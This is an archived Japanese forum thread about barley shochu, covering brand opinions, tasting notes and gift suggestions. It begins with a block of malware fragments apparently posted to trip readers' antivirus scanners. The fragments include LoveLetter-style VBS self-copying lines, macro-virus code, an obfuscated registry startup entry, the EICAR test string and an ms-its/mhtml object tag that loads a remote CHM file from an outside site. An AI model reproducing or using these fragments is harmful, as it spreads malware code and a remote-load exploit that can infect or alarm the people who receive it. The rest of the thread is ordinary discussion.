c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

170 :呑んべぇさん:2006/10/04(水) 22:49:22
さすがウィルスバスタービクともしないぜ

171 :呑んべぇさん:2006/10/05(木) 12:44:13
>>166
いやぁ、勉強になった。
2ちゃんってすごいね。

172 :呑んべぇさん:2006/10/05(木) 21:07:36
さすがdebian、うんともすんとも言わないぜw

いいちこの1800mlパック、3日に1本なくなるんだけど
ビール飲んでた頃より酒代が安い1日500円以下だし

ビールだと500ml缶を5本くらい飲むから、どうしても1日1300円程度になる

173 :呑んべぇさん:2006/10/05(木) 22:12:43
俺は美味い酒をちびちびやることにするよ

174 :呑んべぇさん:2006/10/11(水) 00:04:15
お湯割りの季節だねえ

175 :呑んべぇさん:2006/10/15(日) 18:48:21
神の河うまいなぁ

176 :呑んべぇさん:2006/10/15(日) 21:29:11
ああ

177 :呑んべぇさん:2006/10/16(月) 06:29:06
「おこげ」まるで麦茶を飲んでるようで面白い味だったが...途中で飽きた
「初潮」狙いたい所は分かるが、これ飲むのだったら旭万年

「千が飛ぶ」まあまあの味。別に飲まなくてもいい酒

178 :呑んべぇさん:2006/10/16(月) 12:14:51
177

おこげ だけどなんであんなにいろんな酒屋がプッシュしてるかわからんが、あんまり馴染みの酒屋が奨めてくるから1本買ったんあだ。
これさ、麦茶で割ると兼八なんざ比べ物にならん麦の感じが味わえるぜ。

なんだが、ムギムギしさばかり求めた俺たちへの酒蔵からの思いが一石投じられた感じがしました。

179 :呑んべぇさん:2006/10/16(月) 21:09:48
>>178

おこげ 麦茶で割らないとその味がでないのか?

ロック、湯割りの場合はどうなんだ?

すまんが教えてくれ!

180 :呑んべぇさん:2006/10/16(月) 21:27:12
そりゃまあ、麦茶で割れば麦臭いわな

181 :呑んべぇさん:2006/10/16(月) 21:48:05
>>179
麦を煎ってあるのでムギムギしさはあるよ。それは変わらない。
水割りとかロックにすると薄くなるのは当たり前だ。

また、香ばしくもある酒だとは思うが、開封直後は癖がありすぎてどうにもならん。

開封後三ヶ月してから飲んで丁度良いくらいだよ



182 :呑んべぇさん:2006/10/16(月) 22:05:58
酔っちょくれってどう思う?

183 :呑んべぇさん:2006/10/17(火) 07:31:25
酔っちょくれってどう?
兼八を凌ぐ旨さって書いてるけど

184 :呑んべぇさん:2006/10/17(火) 07:32:08
すまん

185 :呑んべぇさん:2006/10/17(火) 09:05:51
>>179

レスあんがと。

湯割りでもムギムギ感はあるようだなぁ。
見かけたら買ってみるよ。
開封直後の癖って、龍。とかの感じなのかな・・・?


186 ::2006/10/17(火) 12:48:52
すまん・・・

>>181へのレスですた。^^;

187 :呑んべぇさん:2006/10/17(火) 17:57:05
三段仕込みってうまいの?

188 :呑んべぇさん:2006/10/17(火) 18:48:04
いいちこウマス

189 :呑んべぇさん:2006/10/18(水) 00:52:59
>>185
ごめん。ろんてんが未飲なのでわからないです。
ちなみに、今日開封したおこげの試飲をしましたがやっぱりマズかったです。
しかし、うちにある開封後三ヶ月程度経過したものは旨かった。

開封後に旨くなるってよくみるけど、初めて実感したわ。

190 :呑んべぇさん:2006/10/18(水) 07:22:05
万年星ウマイね

隠し蔵の三悪人もなかなか


191 :呑んべぇさん:2006/10/18(水) 23:35:12
芋で有名な松露って銘柄があるんだ、同じ蔵が同じ銘柄で麦を作っているんだが
コイツが旨かった。
最近はやりのガツンと麦の重い香ばしいのがでていました。

値段が安いのもまた嬉しいです。

192 :呑んべぇさん:2006/10/18(水) 23:49:01
じゃくんばくの切り口(広がる甘み)で、特醸泰明の香ばしさが表現できれば。
兼八になりまつね。

193 :呑んべぇさん:2006/10/19(木) 00:00:12
私の定番は天盃と山乃守
常圧だけど、まったく飲み飽きません
ずっと前からすっかりこれに落ち着いて他銘柄に
食指が動くことがなくなってしまいました

194 :涙犯  ◆PASSMaN//g :2006/10/19(木) 00:50:35
二階堂を4日に一本づつ飲むのがキボン
外で、居酒屋では、安くてキボン
そっからは、なんやらかんやら飲むかな。
麦バンザイ(^.^)b

195 :呑んべぇさん:2006/10/19(木) 02:51:20
みんな色んなの飲んでるんだな
俺はいいちこで十分w安上がりw

196 :呑んべぇさん:2006/10/19(木) 18:16:21
みんな色んなの飲んでるんだな
俺は大吾郎で十分w安上がりw

197 :呑んべぇさん:2006/10/19(木) 18:32:17
>196
まさかそれに麦茶を混ぜているからここにいるわけじゃないよな?

198 :呑んべぇさん:2006/10/19(木) 22:15:05
ビール党のオヤジが、「嵐影」って焼酎をもらったから、オマエにやるよって。
ググって見たら新製品らしく、常圧蒸留、黒麹仕込み、裸麦、無炭濾過らしいので、
味は流行の麦チョコ系かな?
誰か、飲んだ人感想キボンヌ。

199 :呑んべぇさん:2006/10/19(木) 22:17:58
>198
で、きみの感想は?新しいやつなんだから早く感想だしとくれ。

200 :呑んべぇさん:2006/10/19(木) 22:19:56
>199
いや、まだ手元にない。今度の日曜日取りに行くんだが。

201 :呑んべぇさん:2006/10/19(木) 23:43:44
いいちことか恥かしくてレジに持っていけんw
やっすい酒飲んでんだなぁとか思われるやろ
俺が買うのは最低でも1480円以上の焼酎だ
それ以下ははずい

202 :呑んべぇさん:2006/10/20(金) 01:07:29
焼酎飲んでるのがはずかしいという気持ちがないことに驚く

203 :呑んべぇさん:2006/10/20(金) 03:00:05
フラスコ買えばいいやん

204 :呑んべぇさん:2006/10/21(土) 01:28:23
博多の華(麦)さいこー

205 :呑んべぇさん:2006/10/21(土) 02:28:29
>>194
俺か?
忙しさによって量は変動するが。

ナカーマ

206 :呑んべぇさん:2006/10/22(日) 19:25:01

  _  ∩
( ゚∀゚)彡 とっぱい! とっぱい!
 ⊂彡


207 :呑んべぇさん:2006/10/23(月) 00:26:51
二階堂

208 :呑んべぇさん:2006/10/23(月) 06:10:57
縣屋

209 :呑んべぇさん:2006/10/23(月) 06:11:42
陶山

210 :呑んべぇさん:2006/10/23(月) 16:56:34
>>201
1480円でもオレは十分恥ずかしいんだが…

211 :呑んべぇさん:2006/10/24(火) 23:43:21
>>200
「今度の日曜日」は、とっくに過ぎたが?
業者、宣伝乙。

212 :198:2006/10/25(水) 21:53:06
>211
業者じゃないよ。
飲んでみたら、無炭粗濾過な割には、思ったほど味に癖がなかった。
麦旨み強く、濃厚に甘さが立つ感じで、ふしぎ屋の様な甘み系のタイプかね。

お湯割りにすると麦麦しく強く香り立つけど、
ロックやストレートで甘さを楽しむ方が合っているかとオモタ。

213 :呑んべぇさん:2006/10/27(金) 01:13:22
大和魂!

214 :呑んべぇさん:2006/10/27(金) 01:25:28
豪気

215 :呑んべぇさん :2006/10/27(金) 22:12:01
高千穂酒造の”わかむぎ”。安くてそれでいてまろやか、旨いです。同じ酒造会社の常圧の高千穂はにおいがきついが、この”わかむぎ”は臭いも気にならない。
量販店で1000円未満。しばらくはこれで一杯続けます。

216 :呑んべぇさん:2006/10/27(金) 23:24:54
四ツ谷の宇佐むぎ飲んだ。
なんかいいちこシルエットに似てるな
まぁまぁうまい


217 :呑んべぇさん:2006/10/28(土) 21:14:49
レトルトぜんざいの麦焼酎割り(つうか逆w)
中々ウマー

218 :呑んべぇさん:2006/11/03(金) 11:40:05
三段仕込みだけど何年か前に買ってあまり口に合わなかったんで放置してた。
たまたま物置整理してたら出てきたので飲んでみたら驚くほどまろやかになっていた。
お湯割りにしたらもっとうまい!

物置の整理は今日は終わりですよ。

219 :呑んべぇさん:2006/11/03(金) 13:45:54
兼八とおこげと遥濫がうまい!

220 :呑んべぇさん:2006/11/03(金) 21:46:51
二階堂といいちこで結構だ、おまえらは

221 :呑んべぇさん:2006/11/03(金) 21:55:41
フラスコなら飲んでも良い。

222 :呑んべぇさん:2006/11/04(土) 20:48:24
請福むぎってやつ飲んだことある?

223 :呑んべぇさん:2006/11/05(日) 06:44:24
>>222
7年熟成の奴なら持ってる。まだ飲んでいない。
沖縄で麦焼酎?沖縄って泡盛だけじゃないの?って興味本位で買ってみた。

224 :呑んべぇさん:2006/11/06(月) 08:33:37
三段仕込み 飲んでみた。

開栓したてだからかもしれないが、美味くねぇ〜よ・・・。
表現が悪くて申し訳ないが、油のような感じの味がした。

>>218 にもあるように、今度はしばらく寝かせてから飲んでみるかぬw

225 :呑んべぇさん:2006/11/06(月) 18:22:03
三段仕込みの事を書いているやつの文章がみんな似通っている点について

226 :呑んべぇさん:2006/11/07(火) 10:49:35


何言ってんの?  (´ー`)┌ フッ

227 :呑んべぇさん:2006/11/08(水) 11:04:10


228 :呑んべぇさん:2006/11/11(土) 21:35:59
>>223
99年製のやつでしょ?
99年製のしかないと思われ
飲んでみたけど香ばしい系とはちょっと違うけどそこそこうまい
後味が泡盛っぽく感じるのはオレだけ☆カナ

229 :呑んべぇさん:2006/11/12(日) 20:48:59
オマエだけ☆カナ

230 :呑んべぇさん:2006/11/13(月) 22:17:54
>>☆カナ
請福の麦飲んでみたよ。結構良かった。
ネタとして1升買っても良いかなと思ったよ


231 :呑んべぇさん:2006/11/13(月) 23:53:56
万年星うまし
道中うまし
魏ぱちうまし

232 :呑んべぇさん:2006/11/13(月) 23:56:02
その道中は42度のやつ☆カナ

233 :呑んべぇさん:2006/11/14(火) 00:47:21
今更ながらふしぎ屋初飲!
めちゃめちゃ美味かった☆カナ

234 :呑んべぇさん:2006/11/14(火) 21:08:21
麦だけの宝焼酎ってのを見て
(本格焼酎でない)乙類焼酎かと思ったら
しっかり甲類焼酎だった(´・ω・‘)

235 :呑んべぇさん:2006/11/14(火) 22:37:09
>234
本格焼酎・乙類焼酎・甲類焼酎のそれぞれの意味わかる?

236 :呑んべぇさん:2006/11/14(火) 23:41:16
ゴーグル先生に聞けばおk

237 :呑んべぇさん:2006/11/15(水) 12:52:40
ゴグレカス

238 :呑んべぇさん:2006/11/15(水) 13:15:34
ゴーグルを検索したけど眼鏡の事しか出てこないお><

239 :呑んべぇさん:2006/11/15(水) 17:06:27
ガーゴイルは魔物だよw

240 :呑んべぇさん:2006/11/21(火) 23:12:08
保酒

241 :呑んべぇさん:2006/11/22(水) 23:33:12
高千穂だいすき

242 :呑んべぇさん:2006/11/23(木) 00:05:36
ラムは樽で貯蔵したほうがメインで無色透明のものは
カクテルベースで、そのままロックやストレートで飲むものではないとおもう
テキーラは無色透明のほうがメインでテキーラずきはアネホなどの
樽で熟成させたものより、シルバーをストレートで飲む

焼酎はテキーラタイプだとおもう
だから樫樽貯蔵などで邪魔な香りを付けるなんて無駄、無意味
常圧蒸留原酒を甕やホーロータンクで寝かせたほうがいい

243 :呑んべぇさん:2006/11/26(日) 12:11:57
兼八・一年って酒が近場の酒屋に売ってたけど、みんなが賞賛してる兼八ってこれの事?
一年ってのが気になる

244 :呑んべぇさん:2006/11/26(日) 21:41:36
「魔王」って聞くと
最近どうしてもクラウザーさんを思い出して吹いてしまう。

245 :呑んべぇさん:2006/11/27(月) 11:35:27
「兼八・一年」ってどんなラベルなん?

246 :呑んべぇさん:2006/11/27(月) 14:33:37
ゴーグル先生に聞けばおk

247 :☆壹岐の華☆壱岐県主 ◆EmwOgT22Z. :2006/11/28(火) 00:47:00
忘れられてて悲しいでカキコします。忘れないでw


248 :呑んべぇさん:2006/11/28(火) 00:54:05
>>247
だれ?

249 :呑んべぇさん:2006/11/28(火) 17:29:45
知るもんか!

250 :☆壹岐の華☆壱岐県主 ◆EmwOgT22Z. :2006/11/29(水) 15:02:19
http://www010.upp.so-net.ne.jp/ikishuzo/iki04.html
麦焼酎で忘れられては困るのですよ。

251 :呑んべぇさん:2006/11/30(木) 08:55:39
だいじょぶだぁ〜! 
忘れるもんかよw

壱岐焼酎も美味いもんなぁ〜♪

252 :呑んべぇさん:2006/11/30(木) 10:32:27
いいちこより二階堂の方が味が丸くて好み。
両者とも20度。

253 :呑んべぇさん:2006/11/30(木) 12:51:37
高千穂ばっかり飲んでるよ。
変なにおいがたまらん。

254 :呑んべぇさん:2006/11/30(木) 23:21:01
ごくぶかろんてんを5本ほど買いだめしてそればかり飲んでるよオレはw

255 :呑んべぇさん:2006/12/01(金) 22:11:29
>>252
いいちこは25度のほうが香りがいいよ。
二階堂もうまいけどな。

256 :呑んべぇさん:2006/12/01(金) 23:09:25
ピュアブルーうまかったよ

257 :呑んべぇさん:2006/12/02(土) 20:13:49
麦だけの宝焼酎、ってのを店頭で見かけた。

…甲類じゃんこれ(´・ω・`)

258 :呑んべぇさん:2006/12/03(日) 21:28:59
米だけの清酒とにたようなもんか

259 :呑んべぇさん:2006/12/04(月) 10:13:07
清酒って書けるなら、それは日本酒規格だろう

260 :呑んべぇさん:2006/12/11(月) 10:42:40
ふと思ったんだけど
兼八が人気になって随分経つけど
未だに兼八より旨い(主観だから何ともいえないが)
香ばし系の酒が出ないってのはすごいな。


261 :呑んべぇさん:2006/12/12(火) 15:51:16
久しぶりに旭万年買えたよ
田舎だしまたしばらく買えないだろうから大切に飲むか
ついでに為、の原酒があったから買ってみたお

262 :呑んべぇさん:2006/12/12(火) 16:10:18
家の近くの酒屋ここ数か月萬年星の数が十数本から減らない
俺がひと月に一本減らすが1年は大丈夫そうだな

263 :呑んべぇさん:2006/12/12(火) 18:12:56
このスレを最初から読もうとすると、ノートンがかかりますねぇ。



264 :呑んべぇさん:2006/12/12(火) 21:00:28
舞香さいこーだな ムゥッ〜とくる〜

265 :呑んべぇさん:2006/12/12(火) 21:33:51
>>261 旭万年てどんな味なんかな?何に似てるの?万年は芋しか飲んだことないな。

266 :呑んべぇさん:2006/12/12(火) 21:59:27
何に似てるんだろう…
ガツン系じゃないけど香ばしい
そして心地よい甘さ
かなりまったりした落ち着いた味
しみじみとうまいなぁって思えるよ
これは毎日でも飲みたい

267 :呑んべぇさん:2006/12/12(火) 22:16:38
>>266 ありがとう。そうか、まったりか。
宮崎産は芋も麦もまったり系が多いみたいだな。
黒木さんがその典型か。

268 :呑んべぇさん:2006/12/12(火) 22:39:38
黒木みたいなまがいものと旭万年をいっしょにすんな

269 :呑んべぇさん:2006/12/12(火) 22:46:31
まがいものW おこられっどW

270 :呑んべぇさん:2006/12/12(火) 23:12:53
旭万年は方向性は間違ってないけど
あと一歩、あともう少しガツンが足りなかったな

271 :呑んべぇさん:2006/12/13(水) 09:52:15
だがそこがいい

272 :呑んべぇさん:2006/12/13(水) 11:23:18
ここで言う旭万年て、万年星じゃなくて、麦麦万年でもなくて旭万年?
旭万年35度っていう芋はあるが、麦にもあるのか?

273 :呑んべぇさん:2006/12/13(水) 12:46:22
ご想像にお任せ致します

274 :呑んべぇさん:2006/12/13(水) 14:30:37
月の女神と麹屋伝兵衛の意見を聞いて見たいです。度数が高いから、好みもそれぞれあるから聞いて見たいやっぱり芋より麦だね!!

275 :呑んべぇさん:2006/12/13(水) 16:44:52
>>274

「月の女神」は美味いでぇ〜w
百年が好きな人なら気に入ると思うけど・・・。
入手し易いし、お試しあれ!

「麹屋伝兵衛」は分からん・・・。(;´Д`) うぅっ。。

276 :呑んべぇさん:2006/12/13(水) 17:37:53
↑↑ご意見ありがとうございます。今度飲んでみます。月の女神なんて、ネーミングがいいですね。

277 :呑んべぇさん:2006/12/13(水) 19:00:39
今度、婚約者の実家へ挨拶に行くのですが
先方の父親に焼酎を贈ろうと思ってます
彼に聞くと、あまりクセのない飲みやすい麦焼酎が好みのようです
何かオススメの銘柄ありますか?
あまり安すぎず、出来れば箱入を探してます(包装したいので)
携帯からですが、宜しくお願いします

278 :呑んべぇさん:2006/12/13(水) 19:28:38
舞香

279 :呑んべぇさん:2006/12/13(水) 19:52:36
屋久の碧玉

280 :呑んべぇさん:2006/12/13(水) 20:00:25
吉四六 飲んだこと無いけど

281 :呑んべぇさん:2006/12/13(水) 20:57:27
>>277
樽熟成系がいいんじゃないかな
夢想仙楽とか

282 :呑んべぇさん:2006/12/13(水) 21:25:21


283 :呑んべぇさん:2006/12/13(水) 21:26:56
>>278
あまりクセのない飲みやすいって言ってるのに、
なんで舞香なんだよバカ

284 :呑んべぇさん:2006/12/13(水) 21:52:50
天使の誘惑

285 :呑んべぇさん:2006/12/13(水) 21:53:55
フラスコでいいとおも

286 :呑んべぇさん:2006/12/13(水) 22:00:48
減圧で質のいいやつだと、
いいちこのフラスコは喜ばれるかもしれんな
箱入りで瓶がステキで

287 :呑んべぇさん:2006/12/13(水) 23:09:49
>>278
マジレスすると月心が1番喜ばれると思うお
ラベルデザインいいし、おとうさんも喜ぶ事まちがいない!!!111

288 :呑んべぇさん:2006/12/13(水) 23:22:19
>287
飲みやすい奴って言ってるだろ

289 :呑んべぇさん:2006/12/13(水) 23:32:10
おまえみたいな聞き分けの悪いやつは吉四六の壷でも買って持っていけッ!

290 :呑んべぇさん:2006/12/14(木) 00:26:37
277です
みなさんアドバイス有難うございます

私はお酒を飲みませんので、飲みやすさ等解りませんが
みなさんのアドバイスを参考にして、ネットや店頭でも調べてみます

*帰りによった酒屋さんで「夢想仙楽」と「いいちこフラスコ」がありました
 どちらも、贈り物には良さそうですね



291 :呑んべぇさん:2006/12/14(木) 01:14:34
じゃあ、マジレスしちゃいます
特醸泰明で問題ない

292 :呑んべぇさん:2006/12/14(木) 01:27:55
やっぱり度数が高い方が香りもいいんだろうな。
加水されて薄まるのはエタノールだけじゃないし。

293 :呑んべぇさん:2006/12/14(木) 01:54:26
中々でいいんじゃね?


294 :呑んべぇさん:2006/12/14(木) 08:46:42
耶馬美人はどうか?
減圧では最高クラスだと思う。

295 :呑んべぇさん:2006/12/14(木) 14:57:23
だからすっきり系なら「月心」か「ごくぶかろんてん」だって
釣られないで!!!!11

296 :呑んべぇさん:2006/12/14(木) 15:26:36
カワイソスw
お前らもうちょっとまじめに答えてやれよw
俺が教えてるやるよ
歌垣にしときな
これマジ飲みやすいから

297 :呑んべぇさん:2006/12/14(木) 17:32:22
>>277

ではマジレスを・・・。

「クセのない麦」を希望のようだが、クセはどんなものでもあるんだよなぁ。

だから、飲んで「ウマァ〜!」と感じればいいんだろ?
>>291の「特蒸泰明」はピッタリだな。 比較的に入手し易いし。
「ごくぶかろんてん」もいいぞ。
「月心」はちときついと思われる。
「夢想仙楽」などの樽熟成が好みなら「月の女神」もおすすめ。

まぁ、貰って飲んで喜ばれるのは「兼八」だろうなぁ・・・。
入手困難だけど頑張って探してみな。

298 :呑んべぇさん:2006/12/14(木) 17:44:52
兼八は好き嫌いがあるよ
いいちこ等が好きな人には合わない可能性が高いと思う

299 :呑んべぇさん:2006/12/14(木) 18:29:50
耶馬美人化粧瓶なら箱あったっけ?

300 :呑んべぇさん:2006/12/14(木) 20:05:05
>297みたいのが一番困るんだよな。
誰でもかれでも兼八や特蒸泰明を勧めればいいってもんじゃないだろ。
常識的に考えれば>>277のようなレスには
減圧の焼酎で高価なのを勧めてる人がまともであり親切だよ


301 :呑んべぇさん:2006/12/14(木) 20:18:27
兼八でも原酒を冷凍庫で冷やしてストレートで飲んでくれと言ったら
減圧好きでも喜ばれると思うよ
その人の焼酎の飲み方ではないだろうけどね
ちびちびやってもらったほうが贈答品としてはいいのかもしれない

フラスコが無難ではあるなあ

302 :呑んべぇさん:2006/12/14(木) 21:00:39
飲み慣れた人が通気取りで、
自分の視点で一般の人に飲み方まで押しつけても
ありがた迷惑というのがあるんだよ

303 :呑んべぇさん:2006/12/14(木) 21:11:31
>>300みたいなのが一番最悪で困るんだよなぁ。

人の意見にいちいちケチをつける奴。(アッ 俺もかw)
んで自分の意見を言えないみたいだしな。

何が「常識」で、何が「まとも」で、どこが「親切」なのか・・・。

高価がいいのか?
後で「美味かったよ!」と言われる方がいいと思うがな。

まぁ、嗜好品だから人の好みは人それぞれだからな。

304 :呑んべぇさん:2006/12/14(木) 21:18:41
天保二年じゃだめなの?

305 :呑んべぇさん:2006/12/14(木) 22:03:38
>>303
自意識過剰でゴーイングマイウェイの人なんだろな。
誰にでもかれでも兼八を勧めて
自分のうんちくを語りたいだけなんじゃないの?
>277さんが「クセのない飲みやすい麦焼酎で、
あまり安すぎず、出来れば箱入を探してます」って言ってるのに。
相手に合わせたアドバイスしてあげるのがまともでしょ

306 :呑んべぇさん:2006/12/14(木) 22:27:49
まぁ、はっきりしたのは麦焼酎好きにはウザい奴が多いってことだな。



307 :呑んべぇさん:2006/12/14(木) 22:31:19
>306と>303の最後がなんかそっくり笑

308 :呑んべぇさん:2006/12/14(木) 22:41:52
ネタがないから、オススメ教えてレスだけでこんなにも大騒ぎw

309 :呑んべぇさん:2006/12/14(木) 22:57:33
そこで銀座のすずめですよ。
たしか高めので箱入ったのもあったはず?

310 :呑んべぇさん:2006/12/15(金) 20:35:10
関係ないけどチラ裏
今近所の酒屋(ごくぶかろんてんのラベルに名前がある店 東北)で
「大島」と「麦一献」の四合瓶買ったら
おまけで「兼八」をサービスしてくれた・・・


いま兼八初体験中です
まじ最高
ジーク兼八ですよ

311 :呑んべぇさん:2006/12/15(金) 20:46:00
大島って鹿児島酒造のやつだよね?こっち飲んでよw
俺には合わなくて一口飲んで(ry だったんだけど他の人の感想聞きたいお

そんな俺は今為.の原酒を開封して飲んでみたんだけど
うまいことはうまいが意外とあっさりしてるなこれ

312 :呑んべぇさん:2006/12/15(金) 21:10:27
>>311
そう鹿児島酒造のやつです
その店が今、大島を大プッシュしてたので買ってみたけど・・・

第一印象はすっきりで。常圧だけど「洗練されたいいちこ」っていう
感じで
口当たりにはまろみが感じられるし、すんなり入って来ますけど
兼八と交互に飲むと全く対局の酒ですね

つか兼八が最高すぎてコメントしづらいですw

為 原酒はガツン系との噂聞いてましたが・・・
あっさりですか・・・でも飲んでみたいです

ではもいっかい兼八いきます


313 :呑んべぇさん:2006/12/15(金) 22:41:17
お前いいやつだなw
俺が飲んだ大島は何かがおかしかったのかなぁ
すっきりどころかなんともいえない香と味があってほんとダメだった

じゃ俺は飯も食べたし絹子から飲み始めるか

314 :呑んべぇさん:2006/12/17(日) 19:17:09
おこげの見本品のちっちゃい瓶もらってきたお
こんばん飲んでみる

315 :呑んべぇさん:2006/12/17(日) 22:13:24
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞
麦の舞

316 :呑んべぇさん:2006/12/17(日) 22:15:02
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響
麦の響

317 :呑んべぇさん:2006/12/17(日) 23:48:40
わかったから、おちついて笑

318 :呑んべぇさん:2006/12/19(火) 22:51:04
おこげ強烈だなおいw
濃〜い麦茶っていうかなんつーか
こりゃ構えて飲まないと飲めないよw

319 :呑んべぇさん:2006/12/19(火) 23:07:33
いや、道中がうまい


320 :呑んべぇさん:2006/12/20(水) 23:12:23
ふしぎ屋初呑み
なんか水くせえ(あくまでも主観)

321 :呑んべぇさん:2006/12/21(木) 09:42:09
>>236
【韓国】 経常黒字が激減…1-10月は前年同期比87%減 [12/16]
http://news18.2ch.net/test/read.cgi/news4plus/1166225620/

<丶`∀´>(´・ω・`)(`ハ´  )さん sage 2006/12/16(土) 15:17:09 ID:P748syZN
>>378
この話しは嘘ではない。ゴーグルで検索してみろ。

392 名前: (@д@) ◆gmahCSA0Us [sage] 投稿日: 2006/12/16(土) 15:18:34 ID:LzN4ehEd
>385
「ゴーグル」!!!!?!?!
ちょwwwどんな眼鏡だwwwwそれwww

396 名前: <丶`∀´>(´・ω・`)(`ハ´  )さん [sage] 投稿日: 2006/12/16(土) 15:19:38 ID:P748syZN
>>392
そんな細かい所をつくのが日本のせせこましいところだ。
本筋で反論できないから話しをそらすのか?

【ホロン部】シオレストのガイドライン 洗濯機9台目
http://ex13.2ch.net/test/read.cgi/gline/1160470667/l50


322 :呑んべぇさん:2006/12/21(木) 18:46:20
>>320
だまされて水を飲んだんだろ(あくまでも推測)

323 :呑んべぇさん:2006/12/21(木) 23:36:00
芋焼酎で有名な小鹿に麦もそばもあるんだけどいつも買う通販じゃ売ってない。
地元でも流通量少ないの?

324 :呑んべぇさん:2006/12/21(木) 23:38:24
ゴーグル先生に聞いても出てこないのけ?

325 :呑んべぇさん:2006/12/22(金) 02:27:42
>324
そこにある情報が全てと思うな

326 :呑んべぇさん:2006/12/22(金) 11:53:37
諦めも肝心ってことですよ

327 :呑んべぇさん:2006/12/23(土) 06:02:06
ビールに混ぜて飲んだりするのは邪道?

328 :呑んべぇさん:2006/12/23(土) 06:07:28
モノによる

いいちこを混ぜても誰も文句言わんが兼八入れたら怒る人がいる

329 :呑んべぇさん:2006/12/23(土) 13:04:21
>>327
ほっぴーにすれば


330 :呑んべぇさん:2006/12/23(土) 18:16:40
「百年の孤独」をゲットしました。
何かウイスキーと比較したいのですが、どのあたりがいいでしょうか?

331 :呑んべぇさん:2006/12/23(土) 18:23:22
マジレスで角瓶

332 :呑んべぇさん:2006/12/23(土) 20:57:23
ブレンデッドのウィスキーと比較してもしょうがない。
麦焼酎自体がシングルモルトなんだから

333 :呑んべぇさん:2006/12/23(土) 21:20:24
んじゃグレンエドワーズあたりかな

334 :呑んべぇさん:2006/12/23(土) 22:30:07
今調べて初めて知ったけどグレンエドワーズとかあるんだな笑
6年か〜 麦焼酎も木樽で6年寝かせられるともっと楽しみ増えるのにな〜

335 :呑んべぇさん:2006/12/24(日) 01:13:30
>>332
麦とモルト(麦芽)は違うぞ

でもシングルモルトと比べるのが筋だろうね
ヘタに外国のより国産ウイスキーと比べる方がいいかと
山崎とかでいいと思う

336 :呑んべぇさん:2006/12/24(日) 05:23:24
安めのマッカラン

337 :呑んべぇさん:2006/12/24(日) 05:48:57
エビスと混ぜて美味しい麦焼酎教えてください。

338 :呑んべぇさん:2006/12/24(日) 08:37:17
甲類でいんじゃね?

339 :呑んべぇさん:2006/12/26(火) 22:05:58
普段は「いいちこ」で満足というか、いいちこファンの俺だけど
年末年始にちょっと贅沢したい時に飲む焼酎でおすすめってありますか?。
いいちこのフルーティさ、さわやかさが好きです。
上級のいいちこは除外でお願いします。

340 :呑んべぇさん:2006/12/26(火) 23:20:41
中々

341 :呑んべぇさん:2006/12/26(火) 23:28:35
百年浪漫

342 :呑んべぇさん:2006/12/27(水) 07:10:50
香吟のささやき。包装からして高級っぽい。剥がせばごく普通だけど。
味もフルーティスッキリ系。
安心院蔵。安いけど装いは上級クラス。天下のいいちこを軽く見てる
ヤツらにはこれを飲ませておけば納得するんじゃないか。

343 :呑んべぇさん:2006/12/27(水) 23:08:54
減圧麦でおすすめと言われても、いいちこを越える銘柄を知らないから。
いいちこを越えるのはいいちこだけ。

344 :呑んべぇさん:2006/12/27(水) 23:41:41
正月、嫁の実家に持っていくのですが
猿川って正解?
普段はいいちこ、など飲酒していると思います。


345 :呑んべぇさん:2006/12/27(水) 23:42:58
耶馬美人があるだろ

346 :呑んべぇさん:2006/12/27(水) 23:58:17
さわやかか?

347 :呑んべぇさん:2006/12/28(木) 00:00:59
猿川なんてだいたい何所でも売ってるじゃん
もうちょっと考えろよw
せめて壱岐の華 初代嘉助レギュラーボトルくらいにしろよ

348 :呑んべぇさん:2006/12/28(木) 00:08:39
プレミアム猿川にしとけよ

349 :呑んべぇさん:2006/12/29(金) 14:12:53
人夢可酒ってどうだろう?
いいちこ系?、兼八系?

350 :呑んべぇさん:2006/12/29(金) 17:27:30
>>349
ウィスキー系

351 :呑んべぇさん:2007/01/02(火) 13:20:52
あけましておめでとうございまーす
みなさん麦飲んでますかぁ?

352 :呑んべぇさん:2007/01/02(火) 21:15:00
正月なんで、壺いりの、じいさんの置きみやげのんでます。井田万力屋いいね 兼より入手簡単やし

353 :呑んべぇさん:2007/01/02(火) 21:41:12
ふしぎ屋。かなりヘビーだと思うが家に来た親戚には好評だった。
なんとなくうれしい。

354 :呑んべぇさん:2007/01/03(水) 09:32:33
麦焼酎ファンの皆さんは樽貯蔵麦焼酎をどう評価しますか?。
神の河、隠し蔵、田苑ゴールド・・・。
樽貯蔵物は心地よく木の香りが付いててうまいんだけど、その香りに
麦本来の香りが隠れてしまっているような。

そもそも、「樫樽」というが、「楢」ではないのか?


355 :呑んべぇさん:2007/01/03(水) 11:54:23
